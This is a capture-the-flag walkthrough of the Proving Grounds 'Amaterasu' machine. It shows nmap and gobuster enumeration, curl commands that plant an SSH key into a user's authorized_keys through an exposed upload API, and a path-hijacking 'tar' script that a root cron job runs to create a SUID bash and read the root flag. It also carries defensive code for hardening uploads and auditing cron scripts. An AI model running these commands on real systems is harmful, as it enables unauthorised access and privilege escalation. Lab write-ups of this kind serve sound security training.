PG - Amaterasu

In this walkthrough, we will be going through the Amaterasu room from Proving Grounds. The room is rated Easy on the platform; initial access comes from exploiting a Python File Server API, and privilege escalation to root requires path hijacking. So, let's get started without any delay.

Machine Info:

  Title:       Amaterasu
  IP address:  192.168.196.249
  Difficulty:  Easy
  OS:          Linux
  Description: Amaterasu is an easy machine that is designed to test the enumeration skills of the user. Initial access is taken via a Python File Server API, followed by a path hijacking privilege escalation attack to get root.

Enumeration:

  • I started off with my regular aggressive nmap scan and found only one open port, 21 (FTP), which seemed a bit strange.

$ sudo nmap -A 192.168.196.249
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-12 23:14 IST

Nmap scan report for 192.168.196.249
Host is up (0.18s latency).
Not shown: 992 filtered ports
PORT      STATE  SERVICE          VERSION
21/tcp    open   ftp              vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.45.221
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| vulners: 
|   cpe:/a:vsftpd:vsftpd:3.0.3: 
|     	PRION:CVE-2021-3618	5.8	https://vulners.com/prion/PRION:CVE-2021-3618
|_    	PRION:CVE-2021-30047	5.0	https://vulners.com/prion/PRION:CVE-2021-30047
22/tcp    closed ssh
111/tcp   closed rpcbind
139/tcp   closed netbios-ssn
443/tcp   closed https
445/tcp   closed microsoft-ds
2049/tcp  closed nfs
10000/tcp closed snet-sensor-mgmt
Aggressive OS guesses: Linux 2.6.32 (88%), Linux 2.6.32 or 3.10 (88%), Linux 2.6.39 (88%), Linux 3.10 - 3.12 (88%), Linux 3.4 (88%), Synology DiskStation Manager 5.1 (87%), Linux 4.9 (87%), Linux 3.5 (87%), Linux 4.2 (87%), Linux 4.4 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: OS: Unix

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   174.74 ms 192.168.45.1
2   174.70 ms 192.168.45.254
3   174.78 ms 192.168.251.1
4   176.10 ms 192.168.196.249

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 81.61 seconds

[Screenshot: nmap scan]

  • Next, I performed a full TCP port scan and found three additional unknown services on high port numbers: 25022, 33414 and 40080.

sudo nmap -sS -T5 -p- 192.168.196.249

[Screenshot: all TCP port scan]

Enumerating Port 21 (FTP)

  • I started my enumeration with FTP and logged into the server with the "anonymous" credentials; however, I was unable to list the directories inside it, as the listing kept timing out.

ftp 192.168.196.249

[Screenshot: FTP login]

Enumerating Port 33414 & 40080

  • Next, I enumerated port 33414. It was running a web server, but I found nothing on the index page. We will come back to it later; let's move on for now.

[Screenshot: "Not Found" index page on port 33414]

  • Port 40080 serves a static web page related to Mozilla. I found nothing interesting in the page source or in the site's contents.

[Screenshot: "Mozilla is cool" page on port 40080]

  • Next, I fired gobuster at the servers on ports 40080 and 33414 to reveal any hidden directories. Nothing interesting turned up on 40080; however, the scan of 33414 revealed two interesting endpoints, /help and /info.

gobuster dir -u http://192.168.196.249:40080/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -t 20

[Screenshot: gobuster scan of port 40080]

$ gobuster dir -u http://192.168.196.249:33414/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.196.249:33414/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2024/01/12 23:35:24 Starting gobuster in directory enumeration mode
===============================================================
/help                 (Status: 200) [Size: 137]
/info                 (Status: 200) [Size: 98] 
                                               
===============================================================
2024/01/12 23:48:00 Finished
===============================================================

[Screenshot: gobuster scan of port 33414]

  • Looking at the endpoints found on port 33414 reveals a "Python File Server REST API" on the server. With its help, we can list any directory on the server and upload files to it. Bingo!

[Screenshot: /help API endpoint]

[Screenshot: /info API endpoint]

[Screenshot: listing the contents of the /tmp directory]

  • In the background, I had also started a full aggressive scan on the newly found ports; the results show that port 25022 is running SSH, while 33414 and 40080 we have already explored.

sudo nmap -A -p 25022,33414,40080 192.168.196.249

[Screenshot: full aggressive scan output]

  • Continuing our enumeration through the API endpoint, we can look into the home directory of user "alfredo" and also its .ssh directory. That means that if we can upload our public key into that folder using the API's upload functionality, we can log in to the server as alfredo via SSH.

[Screenshot: alfredo's home directory]

[Screenshot: contents of alfredo's home directory]

[Screenshot: peeking inside the .ssh directory]

Initial Access:

  • To test our hypothesis, let's first upload a text file to the server using the command below.

curl -i -L -X POST -H "Content-Type: multipart/form-data" -F file="@/home/wh1terose/CTF/PG-Play/machines/Amaterasu/test.txt" -F filename="/home/alfredo/test.txt" http://192.168.196.249:33414/file-upload

[Screenshot: uploading a text file via curl]

  • The above command gives a positive result: we were able to upload a file onto the server using the File Server API.

[Screenshot: file successfully uploaded]

  • Now, let's generate an SSH key pair using ssh-keygen and save it in the current working directory.

ssh-keygen

[Screenshot: ssh-keygen]

  • Now we will upload our RSA public key into the .ssh folder of user alfredo. I hit a small hiccup here while uploading, as the API only accepts certain file extensions. So, I renamed my local file to id_rsa.pub.txt, while the uploaded file name is set to authorized_keys. The command below gives a successful hit.

curl -i -L -X POST -H "Content-Type: multipart/form-data" -F file="@/home/wh1terose/CTF/PG-Play/machines/Amaterasu/id_rsa.pub.txt" -F filename="/home/alfredo/.ssh/authorized_keys" http://192.168.165.249:33414/file-upload

[Screenshot: uploading our RSA public key]
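The upload step above works because the extension check is applied to the client's own file name while the "filename" field is used as the destination path unchanged. The following is an added example, not code from the post or from the Python File Server REST API itself: a constructed model of that weak destination logic next to a hardened version that confines every upload to a fixed root. The upload root path and the extension allowlist are assumptions.

```python
import os
import posixpath

# Added example, not code from the post or from the Python File Server REST API
# it targets. It models the upload behaviour the post describes: the extension
# check is applied to the client's own file name, while the "filename" form field
# is used directly as the destination, so an absolute path escapes the upload root.
ALLOWED_EXTENSIONS = {"txt", "pdf"}   # constructed allowlist; the real list is not on the page


def extension_allowed(name):
    return "." in name and name.rsplit(".", 1)[1].lower() in ALLOWED_EXTENSIONS


def naive_destination(upload_root, client_filename, requested_path):
    """Weak form: validates the wrong name and trusts the destination as given.
    os.path.join discards upload_root when requested_path is absolute."""
    if not extension_allowed(client_filename):
        raise ValueError("extension not allowed")
    return os.path.join(upload_root, requested_path)


def safe_destination(upload_root, requested_path):
    """Hardened form: only a plain file name is accepted, the extension check is
    applied to the name that will actually be written, and the final path is
    confirmed to sit directly under the upload root after symlink resolution."""
    root = os.path.realpath(upload_root)
    name = requested_path.replace("\\", "/")
    if name != posixpath.basename(name) or name in ("", ".", ".."):
        raise ValueError("destination must be a plain file name")
    if not extension_allowed(name):
        raise ValueError("extension not allowed")
    dest = os.path.realpath(os.path.join(root, name))
    if os.path.dirname(dest) != root:
        raise ValueError("destination escapes upload root")
    return dest
```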

  • Using the private key generated earlier, I logged into the server via SSH on port 25022, gaining the initial foothold and capturing the local flag.

chmod 600 id_rsa
ssh -i id_rsa alfredo@192.168.196.249 -p 25022

[Screenshot: logged in as user alfredo]

[Screenshot: local flag]

Privilege Escalation:

  • Post-compromise enumeration on the target turned up one interesting cron job entry: a script named "backup-flask.sh" that runs as root roughly every 30 seconds. Looking inside the file, it first sets the PATH variable to the restapi folder inside alfredo's home directory and then uses tar to create a backup of the files in that directory. Because tar is invoked by name rather than by absolute path, that PATH setting makes the script vulnerable to path hijacking: when the cron job runs, a file named tar placed in the restapi folder is executed as root in place of the real binary.

cat /etc/crontab

ls -l /usr/local/bin/backup-flask.sh

cat /usr/local/bin/backup-flask.sh

cat /etc/crontab
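The two weaknesses described above (a PATH entry that a non-root user can write to, and a command invoked by bare name so that PATH decides which binary runs) are easy to check for mechanically. The following audit script is an added example, not from the post; the sample script text it carries is constructed to mirror the post's description of backup-flask.sh, not the real file.

```python
import os
import re

# Added example, not from the post: flags the two conditions the post describes
# in backup-flask.sh (a PATH entry a non-root user can write to, and a command
# such as tar invoked by bare name so PATH picks the binary). Sample constructed.
SHELL_WORDS = {"export", "if", "then", "else", "fi", "for", "do", "done",
               "while", "cd", "exit", "set", "echo"}
PATH_RE = re.compile(r"^\s*(?:export\s+)?PATH=(.*)$")

def path_entries(script_text):
    """Directories from each PATH= assignment; a literal $PATH reference is dropped."""
    dirs = []
    for line in script_text.splitlines():
        m = PATH_RE.match(line)
        if m:
            for d in m.group(1).strip("\"'").split(":"):
                if d and not d.startswith("$"):
                    dirs.append(d)
    return dirs

def writable_by_non_root(path):
    """True if a non-root user could place a binary in this directory."""
    try:
        st = os.stat(path)
    except OSError:
        return False          # missing directory: nothing to hijack through
    return st.st_uid != 0 or bool(st.st_mode & 0o022)

def bare_commands(script_text):
    """First word of each command line that is not an absolute path."""
    found = []
    for line in script_text.splitlines():
        words = line.split()
        if not words or words[0].startswith("#"):
            continue                                  # blank line or comment
        if "=" in words[0] or words[0] in SHELL_WORDS:
            continue                                  # assignment or shell keyword
        if not words[0].startswith("/"):
            found.append(words[0])
    return found

def audit(script_text):
    """Combine both checks; an empty result means neither weakness is present."""
    return {"writable_path_dirs": [d for d in path_entries(script_text)
                                   if writable_by_non_root(d)],
            "bare_commands": bare_commands(script_text)}

# Constructed sample mirroring the post's description of backup-flask.sh.
SAMPLE = ("#!/bin/bash\nPATH=/home/alfredo/restapi:$PATH\nexport PATH\n"
          "tar -czf /tmp/restapi.tgz /home/alfredo/restapi\n")
```

The hardened counterpart is the script with PATH pinned to root-owned system directories and tar called as /bin/tar, for which audit() returns two empty lists.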

  • I tried to make a copy of the bash binary and was able to get it to work by executing as root, but I didn't get root for some reason. Earlier, I had also tried to get a reverse shell, but the machine was not pinging my local box for some reason. Ideally, it should have worked, but it didn't.

echo -ne '#!/bin/bash\ncp /bin/bash /tmp/bash\nchmod 4755 /tmp/bash' > tar
chmod 777 tar
export PATH=/home/alfredo/restapi:$PATH
echo $PATH

[Screenshot: path hijacking attack]

./bash -p

  • So, I used the same technique just to read the root flag and completed the challenge.

echo -ne '#!/bin/bash\n cat /root/proof.txt > /tmp/flag.txt' > tar
chmod 777 tar
export PATH=/home/alfredo/restapi:$PATH
echo $PATH

[Screenshot: flag.txt]

Conclusion:

So that was "Amaterasu" for you. We started off with a regular nmap scan and found a few ports open. We then enumerated the web server running on port 33414 and found a Python File Server REST API v2.5 installation, and abused it to upload an SSH key into alfredo's .ssh directory, which gave us initial access. Next, we found a backup-flask.sh script in the cron jobs that was creating a backup of the restapi directory using tar, and abused the tar invocation with the path hijacking technique to get root. On that note, I will take your leave and will meet you in the next one. Till then, "Happy hacking".
